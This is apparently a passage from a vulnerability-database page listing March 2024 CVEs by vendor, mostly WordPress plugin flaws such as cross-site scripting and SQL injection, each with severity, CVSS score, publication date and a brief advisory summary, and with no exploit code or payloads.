CVE-2024-2242Medium6.12024-03-13The Contact Form 7 plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘active-tab’ parameter in all versions up to, and including, 5.9 due to insufficient input sanitization and output escaping.

Root3 · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-27301High7.32024-03-14Support App is an opensource application specialized in managing Apple devices.

Sagemcom · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-1623High7.72024-03-14Insufficient session timeout vulnerability in the FAST3686 V2 Vodafone router from Sagemcom.

Sandisk · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-22167High7.92024-03-13A potential DLL hijacking vulnerability in the SanDisk PrivateAccess application for Windows that could lead to arbitrary code execution in the context of the system user.

Santesoft · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-1696High7.82024-03-11In Santesoft Sante FFT Imaging versions 1.4.1 and prior once a user opens a malicious DCM file on affected FFT Imaging installations, a local attacker could perform an out-of-bounds write, which could allow for arbitrary code execution.

Scott Reilly · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-27192High7.12024-03-15Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Scott Reilly Configure SMTP allows Reflected XSS.This issue affects Configure SMTP: from n/a through 3.1.

Shapedplugin · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-1363Medium6.42024-03-13The Easy Accordion – Best Accordion FAQ Plugin for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'accordion_content_source' attribute in all versions up to, and including, 2.3.4 due to insufficient inp…

Shellcreeper · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-0906Medium5.32024-03-12The f(x) Private Site plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.2.1 via the API.

Simple-membership-plugin · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-1985Medium4.72024-03-13The Simple Membership plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Display Name' parameter in all versions up to, and including, 4.4.2 due to insufficient input sanitization and output escaping.

Sirv · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2023-50898Medium5.42024-03-15Missing Authorization vulnerability in sirv.Com Sirv.This issue affects Sirv: from n/a through 7.1.2.

Snowflake · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-28851Medium4.02024-03-15The Snowflake Hive metastore connector provides an easy way to query Hive-managed data via Snowflake.

Softing · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-0860High8.02024-03-14The affected product is vulnerable to a cleartext transmission of sensitive information vulnerability, which may allow an attacker to capture packets to craft their own requests.

Soundcloud Inc., Lawrie Malen · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-25936Medium6.52024-03-15Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in SoundCloud Inc., Lawrie Malen SoundCloud Shortcode allows Stored XSS.This issue affects SoundCloud Shortcode: from n/a through 4.0.1.

Sourcecodester · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-2394Medium4.72024-03-12A vulnerability was found in SourceCodester Employee Management System 1.0.

Squirrly · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-1273Medium6.12024-03-11The Starbox WordPress plugin before 3.5.0 does not sanitise and escape some parameters, which could allow users with a role as low as Contributor to perform Cross-Site Scripting attacks

Standalonetech · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-1690Medium4.32024-03-13The TeraWallet – Best WooCommerce Wallet System With Cashback Rewards, Partial Payment, Wallet Refunds plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the terawallet_export_user_search…

Stimulusreflex · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-28121High8.82024-03-12stimulus_reflex is a system to extend the capabilities of both Rails and Stimulus by intercepting user interactions and passing them to Rails over real-time websockets.

Storeapps · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2023-5663High8.82024-03-13The News Announcement Scroll plugin for WordPress is vulnerable to SQL Injection via the plugin's shortcode in versions up to, and including, 9.0.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparat…

Strangerstudios · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-1279Medium4.32024-03-11The Paid Memberships Pro WordPress plugin before 2.12.9 does not prevent user with at least the contributor role from leaking other users' sensitive metadata.

Strategy11 · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-1290Medium6.52024-03-11The User Registration WordPress plugin before 2.12 does not prevent users with at least the contributor role from rendering sensitive shortcodes, allowing them to generate, and leak, valid password reset URLs, which they can use to take ov…

Stylemix · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-2106Medium5.32024-03-13The MasterStudy LMS WordPress Plugin – for Online Courses and Education plugin for WordPress is vulnerable to Information Exposure in versions up to, and including, 3.2.10.

Sysbasics · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2023-51369Medium4.32024-03-15Cross-Site Request Forgery (CSRF) vulnerability in SysBasics Customize My Account for WooCommerce.This issue affects Customize My Account for WooCommerce: from n/a through 1.8.3.

The Libreswan Project (Www.libreswan.org) · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-2357Medium6.52024-03-11The Libreswan Project was notified of an issue causing libreswan to restart under some IKEv2 retransmit scenarios when a connection is configured to use PreSharedKeys (authby=secret) and the connection cannot find a matching configured sec…

Theme-fusion · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-1668Medium6.52024-03-13The Avada | Website Builder For WordPress & WooCommerce theme for WordPress is vulnerable to Sensitive Information Exposure in versions up to and including 7.11.5 via the form entries page.

Themekraft · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-1158Medium4.32024-03-13The Post Form – Registration Form – Profile Form for User Profiles – Frontend Content Forms for User Submissions (UGC) plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the buddyfo…

Themencode · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-25097Medium6.52024-03-13Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeNcode LLC TNC PDF viewer allows Stored XSS.This issue affects TNC PDF viewer: from n/a through 2.8.0.

Themeum · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-1751High8.82024-03-13The Tutor LMS – eLearning and online course solution plugin for WordPress is vulnerable to time-based SQL Injection via the question_id parameter in all versions up to, and including, 2.6.1 due to insufficient escaping on the user supplied…

Tmccombs · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-28854High7.52024-03-15tls-listener is a rust lang wrapper around a connection listener to support TLS.

Tms-outsource · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-0591Medium6.12024-03-13The wpDataTables – WordPress Data Table, Dynamic Tables & Table Charts Plugin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'A' parameter in all versions up to, and including, 3.4.2.2 due to insufficient inpu…

Toyoko Inn It Solution Co., Ltd. · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-27440Medium4.82024-03-13The Toyoko Inn official App for iOS versions prior to 1.13.0 and Toyoko Inn official App for Android versions prior 1.3.14 don't properly verify server certificates, which allows a man-in-the-middle attacker to spoof servers and obtain sen…

Unknown · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2023-7247Medium4.92024-03-11The Login as User or Customer WordPress plugin through 3.8 does not prevent users to log in as any other user on the site.

Veribo, Roland Murg · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2023-51525Medium4.32024-03-15Cross-Site Request Forgery (CSRF) vulnerability in Veribo, Roland Murg WP Simple Booking Calendar.This issue affects WP Simple Booking Calendar: from n/a through 2.0.8.4.

Veronalabs · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-2194High7.22024-03-13The WP Statistics plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the URL search parameter in all versions up to, and including, 14.5 due to insufficient input sanitization and output escaping.

Visualcomposer · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2023-6880Medium6.42024-03-13The Visual Composer Website Builder, Landing Page Builder, Custom Theme Builder, Maintenance Mode & Coming Soon Pages plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's custom fields in all versions up to, a…

Wokamoto · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-0700Medium6.42024-03-13The Simple Tweet plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Tweet this text value in all versions up to, and including, 1.4.0.2 due to insufficient input sanitization and output escaping.

Wowdevs · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-2286Medium6.42024-03-13The Sky Addons for Elementor (Free Templates Library, Live Copy, Animations, Post Grid, Post Carousel, Particles, Sliders, Chart) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the wrapper link URL value in all versi…

Wp Codeus · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-27952High7.12024-03-13Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WP Codeus Advanced Sermons allows Reflected XSS.This issue affects Advanced Sermons: from n/a through 3.2.

Wp-eventmanager · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-0976Medium6.12024-03-13The WP Event Manager – Events Calendar, Registrations, Sell Tickets with WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the plugin parameter in all versions up to, and including, 3.1.41 due to insuffic…

Wpchill · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-1083Medium5.32024-03-13The Simple Restrict plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.2.6 via the REST API.

Wpmaspik · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-25101Medium5.92024-03-13Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in yonifre Maspik – Spam Blacklist allows Stored XSS.This issue affects Maspik – Spam Blacklist: from n/a through 0.10.6.

Wpmu Dev · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-25592Medium5.92024-03-15Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPMU DEV Broken Link Checker allows Stored XSS.This issue affects Broken Link Checker: from n/a through 2.2.3.

Wpmudev · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-0368High8.62024-03-13The Hustle – Email Marketing, Lead Generation, Optins, Popups plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 7.8.3 via hardcoded API Keys.

Wpvivid · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-1383Medium6.12024-03-13The WPvivid Backup for MainWP plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'id' parameter in all versions up to, and including, 0.9.32 due to insufficient input sanitization and output escaping.

Zemena · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-1853Medium5.52024-03-14Zemana AntiLogger v2.74.204.664 is vulnerable to an Arbitrary Process Termination vulnerability by triggering the 0x80002048 IOCTL code of the zam64.sys and zamguard64.sys drivers.

Zephyrproject · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2023-7060High8.62024-03-15Zephyr OS IP packet handling does not properly drop IP packets arriving on an external interface with a source address equal to 127.0.01 or the destination address.

Zitadel · 1 CVE

CVESeverityCVSSKEVPublishedSummary
CVE-2024-28197High7.52024-03-11Zitadel is an open source identity management system.